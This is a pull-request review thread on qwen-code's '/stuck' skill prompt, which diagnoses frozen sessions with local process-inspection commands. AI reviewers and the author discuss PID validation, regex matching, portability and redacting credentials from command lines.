feat(skills): add /stuck diagnostic skill for frozen sessions (#4133)
QwenLM/qwen-code: packages/core/src/skills/bundled/stuck/SKILL.md

## Investigation steps

**Preamble — resolve the runtime base directory.** Required for both paths below (sidecar enumeration in step 1, debug log lookup in step 3, and the PID fast path). The base directory is taken from (in priority order): `QWEN_RUNTIME_DIR` env var, the `advanced.runtimeOutputDir` setting, `QWEN_HOME` env var, and finally `~/.qwen`.

```
RUNTIME_DIR="${QWEN_RUNTIME_DIR:-}"
[ -z "$RUNTIME_DIR" ] && command -v jq >/dev/null && RUNTIME_DIR=$(jq -r '.advanced.runtimeOutputDir // empty' ~/.qwen/settings.json 2>/dev/null)
RUNTIME_DIR="${RUNTIME_DIR:-${QWEN_HOME:-$HOME/.qwen}}"
```

(If `jq` isn't installed, the settings layer is silently skipped — the env-var / default fallback covers the common case.)

**Fast path for targeted diagnosis** — if a digit-only PID argument was given, skip step 1 enumeration but still match the PID to its sidecar so step 3 has the right session ID for log lookup:

```
kill -0 <pid> 2>/dev/null \

>   && ps -p <pid> -o pid=,pcpu=,rss=,etime=,state=,comm=,command= -ww \

Reviewer: **[Critical]** The targeted PID fast path accepts any digit-only PID and immediately prints its full command line before proving that the process is a current-user Qwen Code session. The general scan below was tightened with `-u "$(id -u)"`, but this path bypasses that guard; on a shared host a user can run `/stuck <other-pid>` and have Qwen surface another process' command line (including possible CLI credentials) into the chat. It may then continue into child/socket/stack diagnostics for a non-Qwen process.

Please apply the same ownership and Qwen-process validation before printing or continuing. For example, fetch UID plus command metadata first, then stop unless the UID matches `$(id -u)` and the command looks like Qwen Code:

```sh
ps -p <pid> -o uid=,pid=,pcpu=,rss=,etime=,state=,comm=,command= -ww
# Proceed only if uid == $(id -u) and the command matches Qwen Code; otherwise report that the PID is not a current-user Qwen Code session.
```

_— gpt-5.5 via Qwen Code /review_

Author: 采纳。Fast path 加了 Qwen-process 校验：`kill -0 <pid> && ps -p <pid> -o command= -ww | grep -qE '(qwen|node.*qwen|bun.*qwen)'`，校验失败就停止并报告 'not a current-user Qwen Code session'。同 UID 的非 qwen 进程不再会泄露 argv 进对话。注：跨用户 PID 之前已经被 `kill -0` 的 EPERM 隔住（Linux/macOS 都如此），所以 UID 检查相对冗余，但 Qwen-process 模式校验是真正的新防御。

手动验证：实际 Qwen Code session PID 通过校验，PID 1 (launchd) 正确被拒。修复在 52f5bcc5。

---
name: stuck
description: Diagnose frozen, stuck, or slow Qwen Code sessions on this machine. Scans for problematic processes, high CPU/memory usage, hung subprocesses, and debug logs. Use /stuck or /stuck <PID> to focus on a specific process.
argument-hint: '[PID or symptom]'
allowedTools:
  - run_shell_command
  - read_file
---

# /stuck — diagnose frozen/slow Qwen Code sessions

The user thinks another Qwen Code session on this machine is frozen, stuck, or very slow. Investigate and present a diagnostic report.

## What to look for

Scan for other Qwen Code processes (excluding the current one — exclude the PID you see running this prompt). Since Qwen Code is a Node.js CLI (`#!/usr/bin/env node`), the process name (`comm` column) is always `node` (or `bun` if run with Bun). Identify Qwen Code sessions by looking at the `command` column for a script path inside a `qwen-code/` directory (matches dev / worktree / install layouts) or a bin invocation ending in `/qwen` (matches the global symlink). Avoid loose `qwen-code` substring matching — it false-positives on unrelated processes that merely pass a qwen-code path as a `--cwd` argument (e.g., plugin brokers).

> Signs of a stuck session:

Reviewer: **[Suggestion]** "Signs of a stuck session" list omits the most common hang scenario: state `S` with low CPU

The overview lists D/U/T/Z/high CPU/high RSS/stuck children as signs, but does not mention **state `S` (sleeping) with low CPU** — the exact signature of a hung HTTPS request to the model API. Step 3 correctly diagnoses this case, but a model using only the signs list for initial triage may skip network diagnostics entirely for the most common stuck scenario.

```suggestion
- **State `S` (sleeping) with low CPU** — likely a hung network request to the model API. Check open connections (see step 3).
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳。Signs list 加一行 'State S with low CPU'，明确说这是最常见的 hung HTTPS 信号、要走 step 3 的 network check。这样 triage 阶段就能命中，不会误判 healthy。修复在 42c3ca3b。

- **High CPU (>=90%) sustained** — likely an infinite loop. Sample twice, 1-2s apart, to confirm it's not a transient spike.
- **Process state `D` / `U` (uninterruptible sleep)** — often an I/O hang. Linux uses `D`, macOS/BSD uses `U`. The `state` column in `ps` output; first character matters (ignore modifiers like `+`, `s`, `<`).
- **Process state `T` (stopped)** — user probably hit Ctrl+Z by accident.
- **Process state `Z` (zombie)** — parent isn't reaping.
- **Very high RSS (>=4GB)** — possible memory leak making the session sluggish.
- **Stuck child process** — a hung `git`, `node`, or shell subprocess can freeze the parent. Check `pgrep -P <pid>` (then `ps -p` for state — see step 3) for each session.

## Argument validation

> 

Reviewer: **[Critical]** Process-matching regex requires literal `qwen-code/` directory name, producing false-negatives for non-standard clones

The regex `qwen-code/[^ ]*\.(js|ts|mjs|cjs)` (also at line 53) only matches if the parent directory is literally `qwen-code/`. Clones with names like `qwen-code-x1`, `qwen-code-dev`, or any renamed checkout are silently missed. The second branch `/qwen( |$)` only covers the global bin symlink.

Result: `/stuck` reports "no sessions found" when multiple Qwen Code sessions are actually running — a false-negative at the worst possible time.

```suggestion
# Broaden to match qwen-code followed by any suffix before the path separator:
grep -qE '(qwen-code[^ /]*/[^ ]*\.(js|ts|mjs|cjs)( |$)|/qwen( |$))'
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳合并修复（与 #CmE/#YuJ 同一根因）。新正则 `((^|/)qwen-code[^ /]*/[^ ]*\.(js|ts|mjs|cjs)( |$)|/qwen( |$))`：要求 qwen-code 是 path component（前面是 ^ 或 /），后面允许任意非 / 后缀。同时匹配 `qwen-code-x1/`/`qwen-code-dev/`/worktree clone，并拒绝 `analyze-qwen-code/`、`my-qwen-code-tool/`、qwen-playground 等。验证 10 个 case 全过。修复在 42c3ca3b。

If the user gave an argument, treat it as a PID **only if it consists entirely of digits 0-9**. Anything else — letters, whitespace, punctuation — fails the check, in which case treat it as a free-text symptom description (guidance for the report only, never substituted into shell commands). The strict digit-only whitelist is safer than enumerating shell metacharacters.

## Investigation steps

**Preamble — resolve the runtime base directory.** Required for both paths below (sidecar enumeration in step 1, debug log lookup in step 3, and the PID fast path). The base directory is taken from (in priority order): `QWEN_RUNTIME_DIR` env var, the `advanced.runtimeOutputDir` setting, `QWEN_HOME` env var, and finally `~/.qwen`.

```
RUNTIME_DIR="${QWEN_RUNTIME_DIR:-}"

> [ -z "$RUNTIME_DIR" ] && command -v jq >/dev/null && RUNTIME_DIR=$(jq -r '.advanced.runtimeOutputDir // empty' ~/.qwen/settings.json 2>/dev/null)

Reviewer: **[Suggestion]** `~/.qwen/settings.json` hardcoded — misses settings when `QWEN_HOME` is customized

The `jq` lookup hardcodes `~/.qwen/settings.json`, but the actual `getGlobalSettingsPath()` resolves to `$QWEN_HOME/settings.json` when the `QWEN_HOME` env var is set (see `Storage.getGlobalQwenDir()` in `packages/core/src/config/storage.ts:127-135`). Users who customize `QWEN_HOME` and have `runtimeOutputDir` in settings will get a silent wrong-directory resolution — the skill searches `~/.qwen` while sidecars live elsewhere, producing a false "no sessions found" report.

```suggestion
[ -z "$RUNTIME_DIR" ] && command -v jq >/dev/null && RUNTIME_DIR=$(jq -r '.advanced.runtimeOutputDir // empty' "${QWEN_HOME:-$HOME/.qwen}/settings.json" 2>/dev/null)
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳——一行 fix。改为 `"${QWEN_HOME:-$HOME/.qwen}/settings.json"`。还有一个未覆盖的更深 case（project + system 级 settings 合并），但概率极低，保持当前最小修复。修复在 d3f4bfb8。

> RUNTIME_DIR="${QWEN_RUNTIME_DIR:-}"

Reviewer: **[Critical]** `~` and relative paths not expanded in shell preamble, causing silent sidecar enumeration failure

The `jq` command reads `advanced.runtimeOutputDir` from settings but doesn't expand `~` or resolve relative paths before using `$RUNTIME_DIR` in globs. The actual `Storage.resolvePath()` handles both cases, but the shell script does not.

When a user sets `~/.qwen-runtime` or a relative path, the sidecar scan and debug log lookup silently degrade to `ps`-only mode, potentially missing active sessions with no error visible to the user.

```suggestion
[ -z "$RUNTIME_DIR" ] && command -v jq >/dev/null && RUNTIME_DIR=$(jq -r '.advanced.runtimeOutputDir // empty' "${QWEN_HOME:-$HOME/.qwen}/settings.json" 2>/dev/null)
# Resolve ~ and relative paths (matches Storage.resolvePath behavior)
[ -n "$RUNTIME_DIR" ] && RUNTIME_DIR="${RUNTIME_DIR/#\~/$HOME}"
[ -n "$RUNTIME_DIR" ] && case "$RUNTIME_DIR" in /*) ;; *) RUNTIME_DIR="$(cd "$RUNTIME_DIR" 2>/dev/null && pwd)" || RUNTIME_DIR="" ;; esac
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳。在 jq 行后面加了两行 bash：第一行 `${RUNTIME_DIR/#\~/$HOME}` 替换前导 `~`，第二行 `case ... cd && pwd` 解析相对路径，cd 失败就置空让链路继续 fallback。

实测 5 个 case：
- `~/.qwen-runtime` → `/Users/x/.qwen-runtime` ✓
- 绝对路径直通 ✓
- 相对路径 → 绝对 ✓
- 不存在的相对路径 → 空（继续 fallback）✓
- 空输入保持空 ✓

修复在 2d987d93。

> RUNTIME_DIR="${QWEN_RUNTIME_DIR:-}"

Reviewer: **[Suggestion]** RUNTIME_DIR 前导缺少波浪号展开和相对路径解析

若 `QWEN_HOME=~/custom-qwen` 或 `QWEN_RUNTIME_DIR=relative/path`，shell 不会展开 `~` 或将相对路径解析为绝对路径，导致 sidecar glob 静默找不到文件。建议添加：

```suggestion
RUNTIME_DIR="${RUNTIME_DIR/#~\//$HOME\/}"
[ -d "$RUNTIME_DIR" ] || RUNTIME_DIR="$(cd "$RUNTIME_DIR" 2>/dev/null && pwd)"
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 已在 commit `2d987d93` 完成（上一轮）。jq 行后加了：`${RUNTIME_DIR/#\\~/$HOME}` 替换前导 `~`，`case ... cd && pwd` 解析相对路径。这条 review 应该是基于更早的状态发起的。Closing as already done.

> [ -z "$RUNTIME_DIR" ] && command -v jq >/dev/null && RUNTIME_DIR=$(jq -r '.advanced.runtimeOutputDir // empty' "${QWEN_HOME:-$HOME/.qwen}/settings.json" 2>/dev/null)

Reviewer: **[Suggestion]** RUNTIME_DIR 解析忽略项目级 `advanced.runtimeOutputDir` 设置

`jq` 仅读取 `${QWEN_HOME:-$HOME/.qwen}/settings.json`（用户级），若 `advanced.runtimeOutputDir` 在项目级 `.qwen/settings.json` 中设置则被忽略。建议增加对 `$PWD/.qwen/settings.json` 的检查作为 fallback。

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 不采纳，理由同 Codex 上轮 review。完整覆盖 project + system 多级 settings 合并需要在 prompt 里复刻 qwen-code 的 settings loader 逻辑，复杂度远超价值——绝大部分用户不在 project 级覆盖 runtimeOutputDir。当前 env-var + user-level settings 已覆盖 99% 实用场景，剩下的会自然 fallback 到 ps 路径，功能不会完全失效。

RUNTIME_DIR="${RUNTIME_DIR:-${QWEN_HOME:-$HOME/.qwen}}"

> ```

Reviewer: **[Suggestion]** Self-PID exclusion stated in prose but not implemented in command blocks

The "What to look for" section says "excluding the current one — exclude the PID you see running this prompt", but three command blocks lack this guard:
- Fast path targeted diagnosis (line 39)
- Step 1 sidecar enumeration via `node -e` (line 58)
- Step 2 `ps` scan (line 70)

If a user runs `/stuck` with the diagnostic session's own PID, or the sidecar/ps enumeration picks up the diagnostic process, the report includes a confusing self-referential entry.

```suggestion
# In fast path: add self-check
[ "<pid>" = "$$" ] && echo "That PID is this diagnostic session — /stuck is for diagnosing other sessions." && exit 0

# In Step 1 node -e: accept exclusion PID
node -e 'const self=+process.argv[1]; ... if (p && p!==self) ...' "$$" "$RUNTIME_DIR"/projects/*/chats/*.runtime.json

# In Step 2 ps: filter out self
ps ... | grep -v "^\s*$$\s"
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 不采纳——你的 `$$` 实际是 spawned shell 的 PID，不是 qwen 进程的 PID。run_shell_command 在子 shell 里运行，`$$` 永远不等于触发 /stuck 的 qwen 主进程。模型自身能从对话上下文识别 self（实测在 tmux 验证：模型正确把高 CPU 的当前会话标识为 'this is the session running this /stuck command'）。shell 端硬编码反而错。

> (If `jq` isn't installed, the settings layer is silently skipped — the env-var / default fallback covers the common case.)

Reviewer: **[Suggestion]** `ps` filter regex `qwen-code/` is unanchored, can false-positive on similarly-named directories

The regex `qwen-code/[^ ]*\.(js|ts|mjs|cjs)` matches `qwen-code/` as an unanchored substring. A directory named `analyze-qwen-code/` with a Node process inside would be incorrectly identified as a Qwen Code session, leading to confusing diagnostic output (nonexistent sidecar, missing debug logs).

```suggestion
# Anchor qwen-code as a path component:
grep -E '(^|/)qwen-code[^ /]*/[^ ]*\.(js|ts|mjs|cjs)( |$)|/qwen( |$)'
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 已与 #Cl3/#YuJ 合并采纳——见 #Cl3 的回复，新正则锚定为 path component，同时拒绝 `analyze-qwen-code/` 等前缀 false positive。修复在 42c3ca3b。

**Fast path for targeted diagnosis** — if a digit-only PID argument was given, skip step 1 enumeration. First validate that the PID is a live current-user Qwen Code process; if not, refuse and stop. Without this check, a same-user non-Qwen PID (e.g., a `node my-other-app.js --api-key=...`) would have its full command line dumped into the report.

```

> kill -0 <pid> 2>/dev/null && ps -p <pid> -o command= -ww 2>/dev/null | grep -qE '(qwen-code/[^ ]*\.(js|ts|mjs|cjs)( |$)|/qwen( |$))'

Reviewer: **[Suggestion]** Qwen Code 进程识别正则重复定义

正则 `(qwen-code/[^ ]*\.(js|ts|mjs|cjs)( |$)|/qwen( |$))` 在快速路径（line 46）和 step 2（line 77）中逐字重复。未来修改需两处同步更新，维护风险。建议在文件顶部定义一次命名模式。

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 不采纳。这是 markdown prompt，不是可执行 shell——抽象成命名变量并不能减少模型读取成本，反而让模型多一层间接（要先看变量定义再用）。两处重复对维护影响很小，且每处的语境（fast path vs general path）足够独立。保持现状。

> kill -0 <pid> 2>/dev/null && ps -p <pid> -o command= -ww 2>/dev/null | grep -qE '(qwen-code/[^ ]*\.(js|ts|mjs|cjs)( |$)|/qwen( |$))'

Reviewer: **[Suggestion]** 进程正则是未锚定的子串匹配，与技能自身警告矛盾

技能 prose 明确说「Avoid loose `qwen-code` substring matching」，但正则 `qwen-code/` 是未锚定的子串匹配——`my-qwen-code-tool/dist/cli.js` 会被误匹配。建议锚定为 `(^|/)qwen-code/` 确保 qwen-code 是完整路径组件。

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 已与 #Cl3/#CmE 合并采纳——见 #Cl3 的回复。新正则用 `(^|/)qwen-code[^ /]*/...` 锚定为 path component，与 prose 一致。修复在 42c3ca3b。

```

If this pipeline returns non-zero (PID dead, owned by another user, or not a Qwen Code process), stop the diagnostic and tell the user "PID `<pid>` is not a current-user Qwen Code session". Otherwise, gather stats and the sidecar mapping, then jump to step 3:

```
ps -p <pid> -o pid=,pcpu=,rss=,etime=,state=,comm=,command= -ww

> grep -l '"pid"[[:space:]]*:[[:space:]]*<pid>\b' "$RUNTIME_DIR"/projects/*/chats/*.runtime.json 2>/dev/null

Reviewer: **[Suggestion]** `\b` in BRE grep is not portable across platforms

The command `grep -l ...<pid>\b'` uses basic regex (BRE) without `-E`. On macOS BSD grep, `\b` in BRE matches a backspace character, not a word boundary — the sidecar lookup silently returns nothing. The targeted-PID path loses the session ID for debug log reading and degrades to the `debug/latest` symlink fallback.

Additionally, when PID reuse leaves stale `runtime.json` files, this `grep -l` may return multiple matches with no disambiguation guidance. Add a note: prefer the most recently modified file when multiple results appear.

```suggestion
grep -El '"pid"[[:space:]]*:[[:space:]]*<pid>\b' "$RUNTIME_DIR"/projects/*/chats/*.runtime.json 2>/dev/null
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳。换成 `-El`（ERE 模式），并加了多匹配时取 mtime 最新的指引。

实测结论补充：在 macOS BSD `grep` 上用 `-E` 时，`\b` 实际能正确识别为单词边界——`"pid":12345abc` 不匹配 `12345\b`，`"pid":12345,` 匹配。所以 `-El` 这一项改动已经完整覆盖你的 portability 担忧。修复在 d3f4bfb8。

> If this pipeline returns non-zero (PID dead, owned by another user, or not a Qwen Code process), stop the diagnostic and tell the user "PID `<pid>` is not a current-user Qwen Code session". Otherwise, gather stats and the sidecar mapping, then jump to step 3:

Reviewer: **[Suggestion]** `\b` word boundary in `grep -El` regex matches negative numbers, causing wrong session ID attribution

`'"pid"[[:space:]]*:[[:space:]]*<pid>\b'` uses `\b` which treats `-` as a non-word character. A corrupt or stale sidecar with `"pid": -123` would match when searching for PID 123, feeding a wrong session ID into step 3's debug log read and producing a misleading report.

```suggestion
grep -qE '"pid"[[:space:]]*:[[:space:]]*<pid>([^0-9]|$)' "$RUNTIME_DIR"/projects/*/chats/*.runtime.json
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 不采纳。复盘后这个反例不成立——regex `"pid"[[:space:]]*:[[:space:]]*12345\\b` 在 `"pid": -12345,` 里无法匹配：`[[:space:]]*` 后必须紧接字面量 `12345`，但实际接的是 `-`，所以匹配链在 `12345` 出现前就已经断了。\\b 不会被触发到去吃掉 `-`。负数 PID 在 runtime.json schema 里也不是合法值。

> If this pipeline returns non-zero (PID dead, owned by another user, or not a Qwen Code process), stop the diagnostic and tell the user "PID `<pid>` is not a current-user Qwen Code session". Otherwise, gather stats and the sidecar mapping, then jump to step 3:

Reviewer: **[Suggestion]** 快速路径错误信息笼统，不区分失败原因

「PID is not a current-user Qwen Code session」将三种情况合并：PID 不存在、属于其他用户、是当前用户但非 Qwen 进程。建议将 `kill -0` 和 Qwen 检查分开，分别给出不同错误信息，帮助用户判断下一步。

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳。Fast path 拆成两个独立 guard：`kill -0` 失败 → '...is dead, or owned by another user'；regex 不匹配 → '...is yours but is not a Qwen Code process'。失败信息明确指向下一步该怎么处理。修复在 42c3ca3b。

> ps -p <pid> -o pid=,pcpu=,rss=,etime=,state=,comm=,command= -ww

Reviewer: **[Suggestion]** PID 快速路径缺少凭据脱敏提示

快速路径中 `ps -p <pid> -o pid=,pcpu=,rss=,etime=,state=,comm=,command= -ww` 输出完整命令行，但仅 step 2（通用路径）有凭据脱敏说明。快速路径缺少相同警告，模型可能直接将 `--openai-api-key=sk-…` 写入报告。

```suggestion
ps -p <pid> -o pid=,pcpu=,rss=,etime=,state=,comm=,command= -ww

Note: full command lines may contain credentials passed as CLI args (e.g., `--openai-api-key=sk-…`). Redact such values to `***` before quoting them in the report.
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳。Fast path 加了同样的凭据脱敏 note：完整命令行可能含 `--openai-api-key=sk-…`，引用前 redact 为 `***`。修复在 42c3ca3b。

```

`-E` is required so `\b` is interpreted as word boundary (BSD `grep` without `-E` treats `\b` as a backspace character, silently returning nothing on macOS). The `-l` flag returns the matching sidecar file path; the basename (stripped of `.runtime.json`) is the session ID for step 3's debug log read. If multiple sidecars match (rare — happens only after PID reuse leaves a stale file), prefer the most recently modified one: `ls -t <matches> | head -n 1`.

Otherwise (no arg, or symptom-only arg), run the general path below:

1. **Enumerate live sessions via the runtime sidecar** (preferred, reliable):

   Qwen Code writes a `runtime.json` sidecar for each interactive session at `"$RUNTIME_DIR"/projects/<sanitized-cwd>/chats/<sessionId>.runtime.json`. Each file contains `{schema_version, pid, session_id, work_dir, hostname, started_at, qwen_version}` — the authoritative source of `(pid, session_id, work_dir)` mappings.

   Filter to live `(pid, sidecar-path)` pairs in one shot. Use Node (guaranteed available — qwen-code requires it) instead of `jq` (often missing on default macOS / minimal Linux) so this path doesn't silently degrade:

   ```

>    node -e 'const fs=require("fs"); for (const f of process.argv.slice(1)) { try { const p=JSON.parse(fs.readFileSync(f,"utf8")).pid; if (p) { try { process.kill(p,0); console.log(p+" "+f); } catch {} } } catch {} }' "$RUNTIME_DIR"/projects/*/chats/*.runtime.json 2>/dev/null

Reviewer: **[Suggestion]** RSS threshold conversion guidance is ambiguous and can cause 1024x over-alerting

"Divide by 1024 before comparing to the >=4GB threshold" — dividing KB by 1024 produces MB. An LLM reading this literally would test the MB value against `4` (interpreting it as the threshold), flagging every process >4MB RSS as "very high RSS (>=4GB)" and flooding the report with false positives.

```suggestion
Note: `ps` reports `rss` in **kilobytes** on both macOS and Linux. Divide by 1048576 to get GB, then compare against 4 (which is 4GB). Or compare the raw KB value against 4194304 directly.
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳。改为明确写：KB ÷ 1024 = MB，KB ÷ 1048576 = GB；4GB 阈值是 4194304 KB raw 或 4 GB。并显式提示：不要除一次后跟 4 比，那样会把 >4MB 的进程都误标为 >=4GB。修复在 42c3ca3b。

   ```

   PID reuse is rare but possible — when you cross-reference with `ps` in step 2, skip pairs whose live PID's command line no longer looks like a Qwen Code process.

   **If the command emits nothing** (no sidecars, or no live PIDs), fall through to step 2 — `ps` is the working fallback.

2. **List Qwen Code processes via `ps`** (macOS/Linux) — used to enrich each live session with CPU/RSS/state/uptime, and to catch sessions that may have started before the sidecar feature existed:

   ```

>    ps -xo pid=,pcpu=,rss=,etime=,state=,comm=,command= -u "$(id -u)" -ww | grep -E '(qwen|node.*qwen|bun.*qwen)' | grep -v grep

Reviewer: **[Suggestion]** `ps` regex `(qwen|node.*qwen|bun.*qwen)` is too broad — can match non-Qwen-Code processes

The `node.*qwen` pattern greedily matches any Node process whose command line contains "qwen" anywhere (e.g., `node /projects/qwen-playground/server.js`, `node --require ./qwen-polyfill.js some-tool`). Non-Qwen processes may be diagnosed and their command lines exposed in the chat. Consider anchoring to known Qwen Code entry points:

```suggestion
ps -xo pid=,pcpu=,rss=,etime=,state=,comm=,command= -u "$(id -u)" -ww | grep -E '/(qwen-code|qwen)(/dist/cli\.js)?$|node.*/(qwen-code|qwen)/dist/cli\.js' | grep -v grep
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 概念采纳，但用了与你建议不同的正则。

你建议的 `(qwen-code|qwen)/dist/cli\.js$|node.*/(qwen-code|qwen)/dist/cli\.js` 在 worktree 开发模式下会漏掉真正的 Qwen 进程——因为 worktree 路径是 `qwen-code/.claude/worktrees/.../dist/cli.js`，`qwen-code` 后面紧跟的是 `.claude/` 而不是 `/dist/`，会被你的 anchor 排除。

实测我自己的 tmux 输出：
```
node /Users/.../qwen-code/.claude/worktrees/soft-knitting-neumann/dist/cli.js
```

改为更稳健的版本：`(qwen-code/[^ ]*\.(js|ts|mjs|cjs)( |$)|/qwen( |$))`——要求 `qwen-code/` 后面接任意非空字符的脚本文件路径（`.js`/`.ts`/`.mjs`/`.cjs`），或者 `/qwen` bin 符号链接。这同时排除了你提到的 `qwen-playground/server.js`、`qwen-polyfill.js`，也排除了在我本机额外发现的一类 false positive——Codex 插件的 `app-server-broker.mjs` 把 qwen-code 路径作为 `--cwd` 参数传入，旧正则会匹配它。

实测：worktree dev / dist/cli.js / packages/cli/index.ts / qwen bin 全部 PASS；qwen-playground / qwen-polyfill / Codex broker 全部正确 REJECT。修复在 d3f4bfb8。

>    ps -xo pid=,pcpu=,rss=,etime=,state=,comm=,command= -u "$(id -u)" -ww | grep -E '(qwen-code/[^ ]*\.(js|ts|mjs|cjs)( |$)|/qwen( |$))' | grep -v grep

Reviewer: **[Suggestion]** `pgrep -P` has no fallback for minimal containers without procps

On Alpine, distroless, and some Docker images, `pgrep` may be absent. The `2>/dev/null` suppresses the "command not found" error, and `xargs` receives empty stdin — the pipeline fails silently. The diagnostic reports "no child processes" when the check never actually ran.

```suggestion
# Portable fallback if pgrep is unavailable:
children=$(pgrep -P <pid> 2>/dev/null || ps -eo pid=,ppid= -ww | awk -v ppid=<pid> '$2==ppid {print $1}')
[ -n "$children" ] && echo "$children" | xargs ps -p -o pid=,ppid=,pcpu=,state=,etime=,command= -ww
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 不采纳——qwen-code 几乎不在 Alpine/distroless 这种没有 pgrep 的环境运行。为这种理论 edge case 加 fallback awk 会让 prompt 膨胀，性价比低。在缺 pgrep 的环境里诊断功能降级是可接受的。

   ```

   `-u "$(id -u)"` restricts the scan to the current user — on shared hosts this avoids exposing other users' Qwen process paths/arguments into the chat. `-ww` disables column truncation so long "qwen" paths aren't cut off. The `comm` column will be `node` or `bun`, not `qwen`; filter to rows where the `command` column contains a qwen path (e.g., `qwen-code/dist/cli.js`, or a bin symlink ending in `/qwen`). Cross-reference with the PIDs from step 1.

   Note: `ps` reports `rss` in **kilobytes** on both macOS and Linux. Divide by 1024 before comparing to the >=4GB threshold or reporting in MB.

> 

Reviewer: **[Suggestion]** Child process `ps` command missing `-ww` flag, inconsistent with other ps invocations

The main process scan (step 2) and fast path `ps` both use `-ww` to disable column truncation, but the child process check command omits it:
```
ps -p {} -o pid=,ppid=,pcpu=,state=,etime=,command=
```
Long child process command lines (e.g., `git push origin main --some-long-flag`) get truncated to terminal width, losing key diagnostic context.

```suggestion
pgrep -P <pid> | xargs -I{} ps -p {} -o pid=,ppid=,pcpu=,state=,etime=,command= -ww
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳，并合并 #Cl- 一起修。换成 `CHILDREN=$(pgrep -P <pid> | tr '\\n' ',' | sed 's/,$//'); [ -n "$CHILDREN" ] && ps -p "$CHILDREN" -o pid=,ppid=,pcpu=,state=,etime=,command= -ww`——单次 ps 调用且带 -ww。修复在 42c3ca3b。

   Note: full command lines may contain credentials passed as CLI args (e.g., `--openai-api-key=sk-…`). Redact such values to `***` before quoting them in the report.

3. **For anything suspicious**, gather more context. If the process state alone explains the problem (`T` = accidentally stopped, `Z` = parent not reaping), skip directly to the report — child / log / stack inspection adds nothing. Otherwise:
   - Child processes (with state, so a hung `git` / `node` shows up): `pgrep -P <pid> | xargs -I{} ps -p {} -o pid=,ppid=,pcpu=,state=,etime=,command=`
   - If high CPU: sample again after 1-2s to confirm it's sustained

>    - **Network hang** — if CPU is low and state is `S` despite the user reporting "stuck", the most likely cause is a hung HTTPS request to the model API. macOS: `lsof -i -p <pid> 2>/dev/null | head -20`. Linux: `ss -tnp 2>/dev/null | grep "pid=<pid>,"`. A long-lived `ESTABLISHED` connection to a model host (dashscope, openai, anthropic, etc.) with no recent traffic is the smoking gun.

Reviewer: **[Suggestion]** `lsof -i -p <pid>` has no timeout — may hang the diagnostic itself on macOS

`lsof` is notoriously slow on macOS for processes with many open file descriptors. `head -20` is a post-filter (lsof still collects all data before piping). A stuck Node process may have thousands of FDs, causing `lsof` to block for 10–30+ seconds — ironically freezing the diagnostic tool while diagnosing a freeze. Wrap with a timeout:

```suggestion
macOS: `timeout 10 lsof -i -p <pid> 2>/dev/null | head -20` (or `perl -e 'alarm shift; exec @ARGV' 10 lsof -i -p <pid> 2>/dev/null | head -20` if GNU timeout is unavailable)
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 部分采纳。加了 `-nP` 标志（跳过反向 DNS / 端口符号解析，这两项本身就常常 hang），并提一句可选的 `timeout 10` / `gtimeout 10`。

没有写 perl 兜底——它语法晦涩且 qwen-code 的 shell 工具本身有 backstop timeout，所以 `lsof` 即使卡住也不会永远阻塞。`-nP` 是真正消除常见 hang 来源的实质改动，其余作为 belt-and-suspenders。修复在 d3f4bfb8。

>    - Child processes (with state, so a hung `git` / `node` shows up): `pgrep -P <pid> | xargs -I{} ps -p {} -o pid=,ppid=,pcpu=,state=,etime=,command=`

Reviewer: **[Suggestion]** Child process enumeration spawns O(n) `ps` calls instead of a single merged call

`pgrep -P <pid> | xargs -I{} ps -p {} ...` forks a separate `ps` process for each child PID. If a stuck session has 50+ child processes, the diagnostic itself becomes noticeably slow — right when it's needed most.

```suggestion
children=$(pgrep -P <pid> | tr '\n' ',' | sed 's/,$//')
[ -n "$children" ] && ps -p "$children" -o pid=,ppid=,pcpu=,state=,etime=,command= -ww
```

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 已与 #Cl8 合并采纳——见上。单次 ps 调用 + -ww 一并修。修复在 42c3ca3b。

   - **Debug log** — start with `"$RUNTIME_DIR"/debug/latest` (symlink to the most recent session); if it matches the suspicious PID's session, that's usually the right one. Otherwise infer the session ID from the sidecar and read `"$RUNTIME_DIR"/debug/<session-id>.txt`. Bound the read with `tail -n 200 <path>` — debug logs can be GB-sized. The last few hundred lines typically show what the session was doing before hanging. Debug logs may contain prompts, file contents, or tokens from other sessions — paste only lines relevant to the hang, and never quote secrets/API keys you happen to see.

> 

Reviewer: **[Suggestion]** `ss -tnp` 网络检查在非 root Linux 下可能静默失败

`ss -tnp` 的 `-p` 在非 root 下进程列显示 `-` 而非 PID，grep 返回空——LLM 可能误读为「无网络连接」而非「权限不足」。建议添加说明：若进程列显示 `-`，检查无结论，转而使用 `lsof -nP -i -p <pid>`。

_— DeepSeek/deepseek-v4-pro via Qwen Code /review_

Author: 采纳。在 ss -tnp 那行加 note：非 root 下 -p 会让 PID 列变 `-`，grep 失败但有连接。指引模型在 grep 空但 `ss -t` 仍显示 ESTABLISHED 时退回 lsof，避免误报 'no connections'。修复在 42c3ca3b。

4. **Consider a stack dump** for a truly frozen process (advanced, optional):

>    - macOS: `sample <pid> 3` gives a 3-second native stack sample. Stack frames may include function arguments containing API keys or tokens held in memory — redact such values to `***` before including the dump in the report.

Reviewer: **[Suggestion]** `sample <pid> 3` has no timeout wrapper — the diagnostic can hang on a hung process

